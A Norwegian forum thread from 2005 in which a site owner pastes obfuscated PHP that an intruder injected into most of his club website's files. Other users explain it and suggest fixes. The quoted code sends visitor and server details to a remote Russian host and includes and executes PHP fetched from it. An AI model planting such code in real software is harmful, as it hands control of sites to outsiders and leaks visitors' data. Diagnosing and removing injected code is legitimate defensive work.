Christian_ Skrevet 11. desember 2005 Del Skrevet 11. desember 2005 Det er noen som har kødda med websiden min og lagt denne koden inn i nesten alle php-filene mine, hva betyr egentlig dene koden? error_reporting(0); $a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n); if((include_once(base64_decode("aHR0cDovLw=="). base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw=="). base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}?> Takker for alle svar, vil gjerne ha rettet opp dette fortest mulig mvh Christian Lenke til kommentar
hero_ruler Skrevet 11. desember 2005 Del Skrevet 11. desember 2005 De inkluderer siden : http://user7.phpinclude.ru/ på hjemmesiden din. Lenke til kommentar
Christian_ Skrevet 11. desember 2005 Forfatter Del Skrevet 11. desember 2005 Ikke bra. Mye jobb å få fjerna alt sammen Lenke til kommentar
saivert Skrevet 12. desember 2005 Del Skrevet 12. desember 2005 (endret) De inkluderer siden : http://user7.phpinclude.ru/ på hjemmesiden din. 5282085[/snapback] Det er en underdrivelse. Den koden gjør også at en del informasjon om serveren din samt klientinfo blir sendt til den phpinclude.ru siden. Pass deg for forms som ikke er sikret mot missbruk. Tror du må tette noen sikkerhetshull. Jeg kan godt ta en titt hvis du har kildekoden klar. Endret 12. desember 2005 av saivert Lenke til kommentar
Christian_ Skrevet 12. desember 2005 Forfatter Del Skrevet 12. desember 2005 Det ikke på min personlige side (Tenker på gjestebokinlegget ditt nå saivert), men en side jeg driver for den lokale svømmeklubben. Siden er satt opp av aj-fork + at jeg bruker raabok som gjestebok. Disse kodene har bligg lagt inn på en slik måte at de ikke kan ha blitt lagt inn gjennom et script. Dette må sansynligvis ha skjedd manuelt. Har skifta passord på ftp-en nå for å være helt sikker på at det ikke skjer igjen. Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå